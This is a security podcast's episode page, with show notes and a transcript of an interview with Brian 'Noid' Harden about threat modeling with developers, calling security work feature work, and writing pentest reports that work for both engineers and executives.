https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 1, 20192019-011-part 2 of our interview with Brian "Noid" Harden
Log-MD story
SeaSec East meetup
Gabe (county Infosec guy)
New Slack Moderator (@cherokeeJB)
Shoutout to “Jerry G”
Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407
www.Workshopcon.com/events and that we're looking for BlueTeam trainers please
Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet
Noid - @_noid_
Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3
Slides (PDF)
Security view was a bit myopic?
“What do we win by playing?”
Cultivating relationships (buy lunch, donuts, etc)
Writing reports
Communicating findings that resonate with developers and management
Often pentest reports are seen by various facets of folks
Many levels of competency (incompetent -> super dev/sec)
Communicating risk? Making bugs make sense to everyone…
The three types of power:
https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1 (yas!)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Transcription (courtesy of otter.ai, and modified for readability by Bryan Brake)
Bryan Brake 0:13
Hello everybody this is Bryan from Brakeing Down Security this week you're gonna hear part two of our interview with Noid, we did a lot of interesting discussions with him and it went so well that we needed the second week so for those of you here just catching this now Part One was last week so you can just go back and download that one. We're going to start leading in with the "one of us" story because one of the one of the slides he talked about was how you know he you know learned how to be one with his dev team and one of the last topics we had was kind of personal to me I do a lot of pentest writing for reports and stuff at my organization "Leviathan" and and you know, we talked about you know What makes a good report how to write reports for all kinds of people, whether it be a manager that you're giving it to, from an engagement for a customer, or, you know, the technical people who might be fixing the bugs that an engagement person might find, or a pen tester might find in this case. So, yeah, we're we're going to go ahead and lead in with that. Before we go though, SpectreOps is looking for people to go to their classes. They're learning adversary tactics and red team Operations Training course in Tysons Corner, Virginia. It's currently $4,000 to us and it's from April 23, April 26 of this year 2019. That doesn't include also airfare and hotel, so you're gonna have to find your way to Tysons Corner the Hyatt Regency there's a link in the show notes of course to the to the class if you'd like to go You'll learn things like designing and deploying sophisticated resilient covert attack infrastructure, gaining initial access footholds on systems using client side attacks, and real world scenarios cutting edge lateral movement methods to move through the enterprise and a bunch of other cool things... so yeah if you're interested in and hooking that up you can you there's still you still got more than a month to sign up for it it looks like there might still be tickets so knock yourselves out they're also looking for blue team people. "Mike P" on our Slack channel, which will tell you about the end of the show here on how to join if you'd like, he said http://www.workshopcon.com/events they're looking for blue team trainers... you can hang out with folks like you know, SpecterOps and Tim Tomes (LanMaster53) as well there when you you know we can you sign up for the blue team stuff and yeah http://www.workshopcon.com/events and then you can you know learn to be a blue team trainer or actually give blue team training if you so choose. So that said it's pretty awesome. Alright, so without further ado, we're going to get started with part two of our interview with Noid here, hope you have a great week. And here we go.
Okay. So I think we've gotten down to like the "one of us" story. So we're in our hero finally starts to get it and begins to bridge the gap. Some of the things some of the points are the lessons learned in this story. And you can tell us about story was that language makes all the difference in the world. This is what got me on to the part about the reporting, which we'll talk about a little while, but maybe you could fill us in on this discovery, this the story that got you to these points.
Brian "Noid" Harden 3:37
Okay, so the team I'm working on I get asked the the thing in question is it was a pretty massive product and it had never had any threat modeling done,
Bryan Brake 3:50
okay.
Brian "Noid" Harden 3:51
So had never had any threat modeling done and this this particular product was made up of tons of little sub products. So what I did is I sat there first in a kind of a complete panic going, this is overwhelming. I don't have nearly enough time or resources to be able to do this. But you know how to eat the elephant, right? The small pieces and get at it. So I had one dev lead, who I know, had worked previously on a security product. And he was a nice guy. So I sat down with them and basically said, "Hey, could you walk me through visually diagramming how your service works, building that data flow diagram, and then we're going to talk about it from a security perspective". And he was sort of like, oh, that'd be fun. Yeah, let's do that. And so we sat there and he diagrammed and the whole time he's diagramming, he'd stop and erase things and go, Wait, no, no, we were going to do it that way. But we didn't. And then oh, and we stopped doing it this way, because we added this other thing and we had to be able to break communication out number channels and then he stopped at one point and was like, get a picture of this was like I think this is probably the most accurate diagram of our service we've ever had. And then when we started doing the threat modeling side of it, like, you know, talking about trust boundaries and you know, it's like all right, so what makes sure that you know data from point A to point B and it's not filled with that kind of thing? And I'm saying okay well, could you could you you know, do this over HTTPS rather than just regular HTTP
Bryan Brake 5:29
right
Brian "Noid" Harden 5:31
you know you get non repudiation you know, and it's like, not talking about even the security value of it, but talking more about the you know, you the integrity be there and then at one point, he stops and he looks at me and he says, Man, I never had a threat modeling would generate so much feature work. And in my mind, I was like, talking about feature work like, these are bugs you need to fix. Now, all of a sudden, it was like, Oh, crap, I've been approaching this entirely the wrong way my entire career. Devs look at things that have looked at depth look at things from bug fixing, and feature development. And as a security person, what i, every time I'd been bringing up stuff they needed to do in my mind, it was implied it was feature development. But they saw this bug fixing, because in the "dev world" security fixes or bug fixes. He saw the value here and went, Oh, this is going to generate a ton of feature work. And it's like, oh, so I gotta stop calling the security work. I've got to start calling this feature work. And sure enough, not only if you start calling it feature work. And of course now once you're talking about feature work, you can start talking about the drivers. Why are we building a feature because you know, you don't build features nobody wants. Unless you're certain software companies. But yeah, but you build.. you build features that come out of customer requests, you know, you get features that hey, you know, I look at things like say Microsoft Office, how that's evolved over the years. And that's because people who use Office come back and say, you know, this is really cool. But I'd really like it if when I'm giving my PowerPoint presentation, I had a timer on the screen. So I know I'm on mark, you know, and Okay, that's a feature requests. And so that's how these things evolve. And so once I started talking about security work from the perspective of feature development you know, we have existing features that need to be worked on to give them new functionality in order to be able to pick up new customers and we have new features that we need to build that will also help because the other thing too I also noticed is that well... well I care about things like confidentiality and integrity. Devs care about things like availability and performance, right, these two these two things can kind of be almost used interchangeably, depending on the circumstance, so when, when devs are talking about stability, I'm thinking about integrity. When I'm when I'm talking about availability, they're, they're thinking about performance. And so all of a sudden, I'm now giving them ideas for like new proof counters, basically, like new metrics to check the health of the thing that we're building. And the way I looked at it was almost... Yeah, this is what this is the business driver for the, you know, customer X wants it customer Y needs it, you know, and here's the benefit, you know, the product gets out of it. Here's the benefit that developers get out of it. And what a security get out of it? Hey, don't worry about it. Purely, purely any value I derived from this work is purely coincidental.
Brian Boettcher 8:57
*Chuckles*
Brian "Noid" Harden 9:00
And that, in turn, helps start driving the conversation a lot better. Because the other value I got out of it, too is by having somebody on the development side of the house who had a name and had some, you know, reputation behind him, he was able to go to his respective peers and say, Man, I did this thing with Noid and it was really valuable. And we got a lot of cool stuff out of it. So he's gonna hit you up about it. And I totally recommend doing
Bryan Brake 9:27
right
Brian "Noid" Harden 9:28
and at which point because because some of the folks I worked with were either indifferent towards me, they were just busy. I did have some folks that I work with, though, that were just flat out adversarial towards me. They frankly they didn't want me doing what I was doing. They didn't really want me parking and poking around like the dark corners of the product. You know, because it was going to make work, but having somebody on their side say, No, I actually got value out of this. Okay, well, I'll give it a try. Holy crap, I got value out of this, too. So that was that was where I suddenly realized that my languagein my mind, I'm not saying anything differently. But yet, it turns out that when it comes to the words coming out of my mouth and how they were being received, it radically changed how I was expressing myself to people. And it totally changed the response I got.
Brian Boettcher 10:26
So maybe we need a new "CIA" triad that has the other words on it, you know, the, the translated words for development and product teams,
Brian "Noid" Harden 10:35
possibly!
Bryan Brake 10:36
performance... integrity is stability.
Brian "Noid" Harden 10:43
Yeah, stability. availability...
Bryan Brake 10:48
What's confidentiality then? what does the other bit that they talk about or worry about?
Brian "Noid" Harden 10:52
I don't know if only we had a dev lead on this call.
Brian Boettcher 10:55
*chuckles*
Bryan Brake 10:56
Yeah. Do you know one? *laughs*. So, so the lessons learned, you said, language makes all the difference. You know the way you speak is like, you know, if you're, if you only know English, like most Americans and go over to France, speaking louder in English to somebody who only speaks French is not going to help here to help you so "look for the helpers" So let's say you don't, let's say we're not lucky enough to have somebody like the person you found in your organization is is it it's going to take a little bit longer maybe to get them onto your side to you know, poke at him like that or, you know, maybe grease the wheels with some donuts or you know, maybe take them to lunch or something. Would that be helpful at all?
Brian "Noid" Harden 11:35
Well, first off Yes, you'd be amazed at how much showing up with donuts
Bryan Brake 11:48
Oh, I know
Brian "Noid" Harden 11:49
Oh yeah. No, actually actually it's funny too because I actually just a couple of weeks ago and other team at my company came over and gave my team donuts
They gave my team the IT team and the tech team donuts because of all the work we've been putting in form... as far as I'm concerned. Yeah, I'll march directly into hell for those people right now, because they gave me donuts...
Bryan Brake 11:56
niiiice.
they better be Top Pot donuts or something legit not like...
Brian "Noid" Harden 12:13
Oh, yeah, they were. They were Top Pot donuts. But yeah, so part of its that something else, too is doing some of the work yourself. So, in addition to all this work I'm doing I'm also managing the development of security features. And I had gone over the product spec for one of these security features. And I built a data flow diagram. And then during one of my little weekly Scrum meetings where I sit down with my devs. I showed it to them. and I remember one of them to and he immediately stopped and was like, "What is this?" He's like, "what is this doesn't make sense",
Bryan Brake 12:53
This is forbidden knowledge This is your thing.
Brian "Noid" Harden 12:56
Yeah, you wrote this. Okay, you wrote this, this is just a visual representation of the thing that you wrote. And once I explained it him, sort of the steps one through eleventy, you know, and showed him what had happened. He was sort of like a "Oh, that's interesting". Still somewhat dismissive of it, but it was still kind of a file. So in addition to, you know, buttering people up with donuts, and lunch and things like that, but also sometimes you gotta just buckle down and do it yourself, and then show the value. And I mean, I'll be blunt. That's how I've gone by through most of my career is when I can't get traction. I'll go do it. And then pop up and go. Hey, guys, check this thing out. Oh, wow. That's really neat. How do you do that? Where did you do that? It's like oh, you can do it too. Right now I can show you how I can work with you on it. I'm certainly not going to tell you to RTFM and walk out of the room. So part of it is it also shows a little bit of commitment on your part, sort of one of the things I've picked up that security, not even in the equation here. But just having worked in a lot of software development organizations with the devs and the PMs is the devs is frequently see the PM is not doing anything of value except for when you are. So when you are willing to put that kind of effort into deliver something like that, like, Hey, I thought modeled our service,it sort of shows this, "oh, I take it back. All those things I said about you know, you're not worthless after all." So there's definitely some value there too, because a lot of times too people are willing to say because it's easy to stand back and issue edicts, it's easy to stand back and just, you know, get up on your soapbox and tell everybody else what to do. But when you're when you show you're willing to eat your own dog food. That really gets people's attention because it's like, "Okay, this dude clearly cares about this a lot" And now that he's done it, I see what he's talking about. Yeah. You know, like we should do that there's value here.
Bryan Brake 15:11
So very cool. Yeah. So when you on the last slide here, when you wrapped it all up, you said engage early and often... Does it have to be so when we're talking about communication, open communication, trying to, you know, some of its, you know, cultivating relationships. So, you kind of need to, you know, if you're introverted, you kind of need to step out of your shell a little bit and go and talk to people, get out of your cubes for once a while. Turn on the lights, that kind of thing. How often did you talk with these teams to help build this relationship after a while, because obviously there had to be some team building there?
Brian "Noid" Harden 15:48
Yeah, so in my case, since I was in the team, we thought weekly, okay, weekly, and sometimes daily because they were literally down the hall from me, right, but in terms of where I've had to work in other organizations Where I've been in back in a centralized organization and having to work with remote teams or work with teams that I'm telling them to do things but I'm not in their org... like a weekly basis okay like we're going to meet up this weekbecause like for example like when I was a back when I was at Microsoft I worked in the MSRC before I left yeah and I was handling me and another guy we're handling all the (Internet Explorer)IE cases. Okay. That was a lot of cases because there's a lot of versions i right. So we would go meet with those cats once a week. And we would sit down with them and say, Okay, here's here's the queue. Here's what's new from last time. You know, here's sort of what we think is the priority for fixing things you know, what do you think about it, but it's it's that you always want them to know who you are, and you want them to know that you're just as busy as they are, and that you end that you're also respectful of their time, right? You know, so we'd make the meeting short... personal pet peeve of mine are people that set meetings deliberately long with the expectation of all just go ahead and give everybody 30 minutes. I'll give everybody 30 minutes back, right? Like, well thanks jerk. Like how about you could have just made a 30 minute meeting in the first place? You know it just tells that that that tells me you're not that doesn't tell me you're a magnanimous person that tells me you can't manage your time, you know. So I try to be really concise. Like, I'm going to set up a meeting with these devs. I'm going to include them agenda in the meeting invite. I'm going to set it for exactly how long I think it's like we're going to 30 minute meeting, you know, 30 minute meeting to go over the bugs that are in the queue. There's four new ones from last week one of them's really nasty, you know, that probably is probably going to be a non negotiable.. You know, but the other three are up for negotiation and you show up you sit down with them you know some pleasantries and then you just, you get to work and then you get them back out doing their thing and you get back to your thing. And that really flows well... It really flows well because, you know, none of us like meetings. And the closer you are to touching computers, the more meetings disrupt your flow the more they just disrupt your life and the thing that you're effectively getting usually paid a lot of money for.And so by kind of doing it that way, you keep that cadence up to keep that that sort of friendship and that that rapport up but the other thing too is a another point I wanted to make, but I'm getting tired... but yeah, but but along those lines to Yeah, yo get that rapport there. You're respectful of their time and then you... I can't remember what I was going to say next.
Bryan Brake 19:20
So the last bit was, let's see, don't talk about securities, talk about feature development. We talked about that threat modeling your developers, you and Dr. Cowan, my, my car pool buddy, you and Crispin need to you know get get together and talk about the the threat modeling he's doing... he doesn't do trust boundaries so much, one of the talk he gave at SeaSec East was about how we do threat modeling in our organization but a lot of companies are starting to see value in that before we do engagements because we can prioritize what's the more important thing to test versus just testing all the things in the environment
Brian "Noid" Harden 19:42
Threat modeling and software development is huge too, like that was one of the one of the things I think a lot of my developers I've done this with over the years have taken away from it is one you have to make it fun... You can't make a complete slog. But one of the nice things about threat modeling, is when you're visually looking at the thing you're going to build, that's when you make the realization that like, Oh, hey, my post office has no door... You know, and it's like the best time to figure that out. Then you always like, I always tell people that. Yeah, the best time to fix a bug is an alpha before you write anything... And the next best time to fix it is before it goes into production. And the worst possible time to fix a bug is after I've been in prod for 10 years, and it's a it's a load bearing bug at this point. It has dependencies on it
Bryan Brake 20:30
you know what, it's funny you mentioned that I've been seeing some like Linux kernel bugs they said there was one in there for like 15 years old at affected all of like 2.6.x to up to the latest version. It was a use after free bug, you know that I don't know if they found the bug 15 years ago and just never fixed it but yeah, bugs like that sit in there because people don't don't check for that kind of stuff...
Brian "Noid" Harden 20:51
that happens sometimes those the well I mean, God remember that. Remember the whole SYN flood thing in the 90s? Yeah, I mean it was it was it was in the RFC... One of those like, like, Oh, we found the bug. It's like what? You read the RFC. And just finally understood it. You know, so it's, it's that stuff. And there was an SSH bug that popped up recently. Yep. It was the same thing. It wasn't a terribly nasty critical bug. But it was, in a piece of code that had been in SSH for ever.
Bryan Brake 21:26
Yeah. I seem to remember that one, too. Yeah. I'll have to find a link to that one. So I know you're getting tired. I have one other topic I'd like to discuss because I do a lot of report writing. Well, I I probably should do a lot of report writing but at Leviathan we you know we're the PM grease the wheels we you know, work with a relationship with the the status meetings, we do the executive summary and such and I could be better writing reports some of our testers are way better at it than I am... You know, taking the taking the whole idea of the language and where where things go with this, when we, when we put findings out, we've won, we call them bugs where we call them findings, not necessarily bugs. But what I'm trying to figure out is how we can better communicate our reporting, when we're doing things like readouts, to you know, kind of resonate with both developers and management because the idea is the executive summary is supposed to be for the "managers" or senior folk and then we have like, you know, components that drill down and talk about specifics and be more technical, but, you know, often we find ourselves and I find myself because I come from a more technical background writing more technical to the executives and my question was, Is there ways of communicating risk to both the developers and the managers in the, you know, using using somewhat the same language? Or should we call the bugnot bugs or not findings. We call them, you know, hey, here's a feature you guys should implement, which would be, you know, HTTP or, you know, you must have seen a few pen test reports in your time. And I mean, what is what is your opinion of pen test reports?
Brian "Noid" Harden 23:13
So, my opinion, the most pen test reports, is that their garbage... Well, they're usually written to, they're usually written to one extreme or the other. So unfortunately, I have yet to find any really good language that appeases everybody.
Brian Boettcher 23:30
So what's the one extreme or the other?
Brian "Noid" Harden 23:32
What are the two extremes they're either hyper technical, the sort of stuff that like any of the three of us would probably look at and go, Okay, I get it, right. I understand the value here or there so high level that if I'm a business person, I might be sitting there going, Hey, okay, you know,you've you've reached out you've touched my heart. I understand that this this is a critical like this is a big issue we need to get fixed. But there's not enough meat there that if I took that report and handed it off to my dev lead and said, go fix this. The dev lead is going to sit there and go...
Brian Boettcher 24:09
Are you kidding me?
Brian "Noid" Harden 24:10
Yeah. Like, I don't know what to fix, according to this report says bad things can happen on the network. Are you telling me to go prevent bad things from happening on the network? So that's the thing. I find that Yeah, they either overwhelm you with details or there's not enough substance to them. Okay, so every once in a while, you get a really good one though, you get a you get a you get a really good one. If I could look at just a shout out to CoalFire actually, like their reports.
Unknown 24:39
I mean, okay, So, What is a happy medium type report for you? One that would satisfy the manager folks but also get with, you know, be technical enough. What kind of things would you like to see in reports that you get from them and feel free to you know, talk about the Coalfire thing I guess
Brian "Noid" Harden 25:02
*Chuckles*
Bryan Brake 25:06
*Chuckles* We're always trying to improve our reports that Leviathan we've gone through and done things like test evaluations and you know things like that and no it's fine you know they're they're cool with me doing my podcast on the side so but if you had when you get reports... the good ones... What do they look like well I mean what what kind of things that you're looking for and and and in a pen a proper pentest report?
Brian "Noid" Harden 25:30
Well for me being a technical person one of the things... the biggest thing I'm looking for in a report repro steps, right? If you haven't given me clear repo steps, then you have given me a useless report and that's the thing I've seen reports were basically it's... you know, hey man, we all we popped your domain controller you know, we did this we did that. Look at all freaking awesome we are... And you're like, Okay, I didn't hire you guys to be a circus sideshow. I hired you guys to show me where my risk is, and so I can focus my I know where to focus my efforts. And so those types of so those types of like, "look at how badass I am" reports don't do anything for me... what I do like there were reports that say hey you know we found a cross site scripting vulnerability on this particular product in this particular area. And here is not only screenshots of the cross site scripting vulnerability happening, but here's the repro steps because what's going to happen is, for example, you know, I see something like that and I go, Well, we got to fix that. I'm going to go to my developers. And the first thing my developers are going to ask me is, can you repro it? Can I read through it because one of the things they're going to do is after they fix it, they're going to validate the fix if they don't know how it was exploited in the first place. They're not going to know how to validate the fix. So being able to provide that information... down is is huge for me. Um, but then again, I'm also not, you know the business guy, I'm not the big money guy, I'm I want my report to be technical right so would the executives of my company get the same value out of the report? I probably not... you know when you're talking to the much higher level non technical people what you need to be doing is you need to be making sure you're talking in terms of risk. Sure, you know, you're talking in terms of risk and you're talking in terms of a not technical risk... You know, at the end of the day, the CEO of the company doesn't give a damn that SMBv1 is still on the network, right? They might not even know what that is, right? odds are I'm gonna I'm gonna go out and say they probably don't know what that is. Um, and even in that doesn't mean explain to them what it is because they're not going to care so first. We're going to go from not knowing what it is to not caring what it is. But if you express things in terms of risk of that, you know, the current network architecture, as it stands is very fragile and could be easily brought down, you know, through almost potentially accidental behavior, let alone. malicious behavior. You know, resulting in outages and SLA violations right now, you got their attention, because what they hear there is also if I don't fix this, it might cost me money.
Brian Boettcher 28:36
profit loss.
Brian "Noid" Harden 28:37
Yeah, and that's the thing. It's the, you know, depending on where they're at, in the org structure, you know, I've been in I've been in plenty of organizations before where downtime... downtime is bad... downtime is just, I mean, downtime is never good. But I mean, I've been in organizations where it's like, okay, so I just got promoted to like, super uber director guy. 48 hours into the gig. You know, we had like, a two hour outage,... I'm done.
Bryan Brake 29:08
Busted that SLA, big money...
Brian "Noid" Harden 29:10
even though even though I had nothing to do with it, I'm the accountable one. So, yeah, you have, you know, you need to be able to express things in terms that they translates to, you know, finding out like, like one of the things I back when I used to be a consultant, one of the things I always ask the executive types I'd meet on jobs is what keeps you up at night. You know, what keeps you up at night? Like what you know, don't don't worry about what I'm concerned about, what are you concerned about? Because they might be the same thing. I'm just going to talk to you about it using again, using the words that you care for and understand because I see a lot of technical people try to describe risk to non technical people and they do it by being highly technical and when it's not being understood. They fall back to being even more they take the approach of being in France... not speaking French. So I'm going to speak slower and louder, right? And, and at the end of the day, they're just going to keep shaking their heads going, Man, this guy really wants to express something to make.
Bryan Brake 30:18
Yeah, something must be really important...
Brian "Noid" Harden 30:20
...to agitated by it. I don't know what it is...
Bryan Brake 30:23
Great, now it's blue monkey poo. I don't know what's going on.
Brian "Noid" Harden 30:26
Yeah, so that's, that's it. So yeah. When you're when you're talking to leadership, expressing things in terms of the contract violations, SLA violations, financial financial impact, right? You know, like, like, one of the things I liked when PCI came out and they had like these ridiculous up to $10,000 per bit of PII that gets disclosed and then you explain to a room full of high level people that and if blank were to happen 40,000 bits of PII .would be exposed a you knnow and I'm not so good at math but my calculator here tells me at $10,000 a pop and you watch people in the room real quiet...
Bryan Brake 31:10
oh yeah no that now you know the thing is you just haven't seen a Leviathan one yet so you know if you want to you know reach out to us we'll do a pentest for you we when we don't mind coming out and hanging out doing pen tests for you so
Brian "Noid" Harden 31:24
Frank's a good friend, solid solid human being
Bryan Brake 31:26
no I mean will take your money and will give you a good will give you good drubbing. You will not get up and down left and right. You'll make it hurt. So anyway, actually, yeah, we we actually might need to talk about that a little bit later. I would not hate on that. I get money when people come in its new business. So yeah, I wouldn't hate on that at all.
Brian Boettcher 31:47
I like in in your last phrase or last sentence in your presentation. If you can, avoid even using the word security. I think that's a good summary of what we talked about.
Bryan Brake 32:00
Yeah, that got me too. I was like, Wow. Okay. So it's like, it's like the buzzword you're not supposed to say or, you know, like, you get a shock..
Brian "Noid" Harden 32:08
Treat it like a game. Yeah. Yeah, you got it like a game. But you you'd be amazed it works
Bryan Brake 32:16
hundred percent of the time. It works every time?
Brian "Noid" Harden 32:18
Yeah, hundred percent of the works every time. But, ya know, it it it definitely works because there are people too because there's conditioning, right. The history between security people and software developers is deep and it goes back
Bryan Brake 32:33
it's contentious
Brian "Noid" Harden 32:34
it's contentious at times. And, you know, obviously, you know, you try to try to try to be a good human being, trying to better the world around you. You know, try to,when you whenever you go somewhere, try to leave it in a better condition than you found it. But also understand that the person who may have been there for you may have just straight up just f the place up
Brian Boettcher 32:58
scorched earth
Brian "Noid" Harden 32:59
Yep, yeah. so and so. Yeah. And sometimes, because, I mean, I've got, I've rolled into organizations before where it's like, Why are these people so mad at me? I just got here... And it's like, oh, because the guy you replaced was just got off. And then and it sucks because it's not fair that you have to rebuild those damaged relationships because you didn't damage them. but life ain't fair?
Bryan Brake 33:22
Yep. Well, you know, what, the, the, the whole, you know, DevOps and those things, that was the, you know, the Elysian Fields for developers like, Oh, I can go do anything and enjoy everything, and then it's like, you know, we're, the "no" department where the, we're the where the ones are going to put manacles on them. So, you know, security folks have have got to learn to be flexible, compliance folks can't wield their hammer anymore, like they, they should, if they want to, you know, play with the developers in the devops and the management folks, we talked about this with Liz rice couple weeks ago about getting, you know, security into the devops area and it's like one we got it we gotta learn to be flexible we've got to help them understand that now yeah the bug feature stuff if I'd heard this when we were talking to her I'm almost certain she would agree with us on the fact that you know we can't treat security like security we have treated as feature enhancement in this case
Brian "Noid" Harden 34:16
it is a feature, you know it is a feature and increase the stability of the product that can get increases the customer base of the product it's right it has all the same things to it that any other feature would, but yeah but as far as the security being the note apartment thing to something else is like I still run into security people that they look at themselves as the "No" department that kind of pride themselves on Yeah, and when you find those people just call them out. I mean, just just tell them like, Look, man, that doesn't work. It's never work. Stop it now. Because when you're viewed as the "no" department, no one will ever want to work with you. Why would you want to?
Bryan Brake 34:57
Yep... you're a non-starter
Brian "Noid" Harden 34:59
Yeah, what's go because that was a bit of career advice I got at one point was that basically be solutions focused. You know, nobody wants to basically you're not going to go anywhere if you're the person who's calling out the problem and you might be calling out the problem more articulately than anybody else in the room, you might have a better understanding of the scope of them the depth of the problem, but there is a whole class of manager out there that will just be like, Man, that Noid guy, nothing but problems. Whereas if you instead say, you know, you kind of focus on the sort of the not really the problem, but rather you focus on the solution... "be solutions oriented" to sound like a business guy for a second. And it's like, yeah, you'd be that solutions oriented person, and especially if you can do it with a sort of positive spin, like I had a boss at one point I would stop in his office pissed off every once in a while, and I just be like this is screwed up and that screwed up and blah, blah blah. And he stopped and go "leave my office now and come back in and restate everything you just said. But in a positive way." I don't even know how it will then go sit in the hallway for a few minutes she would come back and I'd be like, okay,we have an opportunity for us. And I tell you I hated them for it. But name if it didn't work.
Bryan Brake 36:32
Oh god. Yeah, that would make complete sense. Yeah, coming in with a positive instead of negative.
Brian "Noid" Harden 36:40
So that's the thing. It's like yeah, even when your negativity is spot on and accurate. There's a lot of people that are like.. "ugh the person is always negative" And then sure enough, yeah, you start focusing on like, oh, you're the positive solutions oriented guy. Even while you're telling them that it's all basically like we're all going to Hell, but I'm doing it in a positive solutions oriented manner, and you'd be amazed how much traction I get you.
Bryan Brake 37:06
Mr. Boettcher, do you have any other thoughts or questions? I want to let Mr.Noid go, cuz he's getting a little ty ty, he's a bit sleepy and he needs to go to bed...
Brian Boettcher 37:15
There's a lot of great tidbits in here. I'm gonna have to listen to it again, and get all of them. And, and again, there's a lot of manager tools references here and, and manager tools, if you're not a manager, that's okay. It's not for managers, all that stuff they talk about is is really valuable to all employees.
Brian "Noid" Harden 37:39
What's it called, the manager tools podcast?
Bryan Brake 37:42
Yep.It's been going on for 12 years.
Brian Boettcher 37:45
Since 2006
Bryan Brake 37:46
Yeah, something like that. It's it's very big. We put a link to the three powers three types of power and one to rule them all in the in the show notes as well. So yeah, go listen to that. I listened to that it's it's one of my regular non-info sec podcast that I listened to, so I listen to it every Monday morning, and when I'm on the treadmill at the gym, so yeah, really, really excellent stuff. If you're, you're out there and, you know, yeah, I mean, it'll help you kind of understand, but if you're out there and you're not a manager yet, it might help you understand where your managers coming from, too.
All right. Mr. Noid how would people get a hold of you if they wanted to maybe have you for more podcasts appearances or, you know, speaking engagements or whatever? Are you going to be speaking anywhere soon?
Brian "Noid" Harden 38:39
Am I I don't know. No, I don't think I am right. Sorry. Are you going anywhere? So question? I am there you go. I am speaking soon. Yeah, I'm, I'm speaking at the NCC group. Open Forum. Oh, that's right. That's next weekend. I don't think it's actually been announced yet. Okay. It's I mean, it's cool for me to talk about it. But yes, it's...
Bryan Brake 39:02
the 12 (of March)
yeah it is the 12th in Fremont, so if you're outside of the Seattle area you're going to be SOL..
yeah they don't record that
Brian "Noid" Harden 39:15
but but I'm going to be giving basically the abbreviated version of my besides talk. they had they had an empty slot they needed to fill up... and they basically said could you do it I said sure and then they said it's 30 minutes long and I'm like well my talks an hour, but how will will make it work... they're I think they're a Tableau up in Fremont...
Bryan Brake 39:37
yeah I'm on that list and yeah I know Miss Crowell over there who's one of the senior managers at NCC she's great lady... she's actually not running she used to run it and and gave somebody else but she still helps out a when she can but yeah, really, really great quarterly open forum that NCC group puts out. Plus they put out a nice spread for dinner certainly good
Brian "Noid" Harden 40:00
I haven't been the one in a while, but they usually a lot of fun. I wouldn't last one of those I went to was a TLS 1.3
Bryan Brake 40:09
I was at that one too.
Brian "Noid" Harden 40:10
That worked out great. Because literally the following weekend, I spoke at DC 206 nice about TLS 1.2 right? and ended up getting Joe to come along and speak about TLS 1.3 and a much more authoritative manner than I could have. It's bad ass.
Bryan Brake 40:24
Yeah, Joe. Joe was on the steering committee for that.
Brian "Noid" Harden 40:28
Yep. Yeah, I think but yeah, that was also nice. He kept me honest. While I was given my talk. I periodically just look at them any kind of nod. I'm not going into the weeds yet. But yeah, as far as getting a hold of me goes the best way to do it is I'm on Twitter @_noid_ or you can email me at [email protected]
Bryan Brake 40:52
Yeah so yeah if you're in the Seattle area and the downtown Seattle area or Fremont area that's really nice place I think parking I think was at a premium The last time we were there
Brian "Noid" Harden 40:52
It's Fremont, parking is always at a premium
Bryan Brake 40:52
they're dodging bikes or whatever like motorized bicycles or whatever so you know
Brian Boettcher 40:52
scooters now
Bryan Brake 40:52
yeah I mean Fremont area they're really weird about their bicycle laws and stuff up there so
Brian "Noid" Harden 41:07
...and zoned parking so watch for your park too
Bryan Brake 41:32
I'm going to get Miss Berlin because you know she's got a lot going on she's you know heading up the mental health hackers group.. you can find her
was it hacker... god I hate this, um... she's @infosystir on Twitter. hackers mental health is her nonprofit. She's running that and you can find that @hackershealth on Twitter, she will come to your convention or conference and do a village. And and, you know it's a nice chill area you can go to, if you're interested in doing that
Brian "Noid" Harden 42:12
is truly doing the Lord's work too.
Bryan Brake 42:14
Yes she is. And we're very proud of her for all that she's doing. So yeah, her and Megan Roddy who's also one of our slack slack moderators... So speaking of our slack we have a very active slack community we just like I said we have "JB" who was promoted to moderator because it's been far too long and he's been doing the the European and Asia book club and he should have been a moderator for a while so did that today gave him access to our secret moderator channel and such and but yeah we have a social contract you can join us by emailing [email protected] or hitting our Twitter which is the the podcast Twitter @brakesec and you can follow me on Twitter.@bryanbrake. Mr. Boettcher, you got a lot going on to sir how would people find you if we wanted to talk about the log MD stuff?
Brian Boettcher 43:10
yeah you just go to log-MD.com... Don't forget the dash right otherwise you'll you'll get some well nevermind...
Bryan Brake 43:20
Is it like WhiteHouse.com *laughs* that's an old joke kids!
Brian Boettcher 43:26
I'd like to say though if you if you do go by your developers donuts or whoever don't eat any between the pickup and drop off right because then you'll show up with four donuts and they'll be like oh thanks great there's 10 of us and you bring us for Donuts
Bryan Brake 43:41
{imitating Forrest Gump]"I had some sorry" Don't do that yeah
yea buy 13 donuts and then eat one for yourself and then say you got it doesn't you go yeah so you're making an appearance you're going to be Bsides Austin at the end of the month along with Ms. Berlin's going to be that one as well. I think?
Brian Boettcher 44:00
I am... Megan's going to be there I'm not sure. Very cool as her home base so we'll see. Nice. Yeah and the classes are cheap. I don't know if they're sold out yet but it's like $100 bucks.
Bryan Brake 44:13
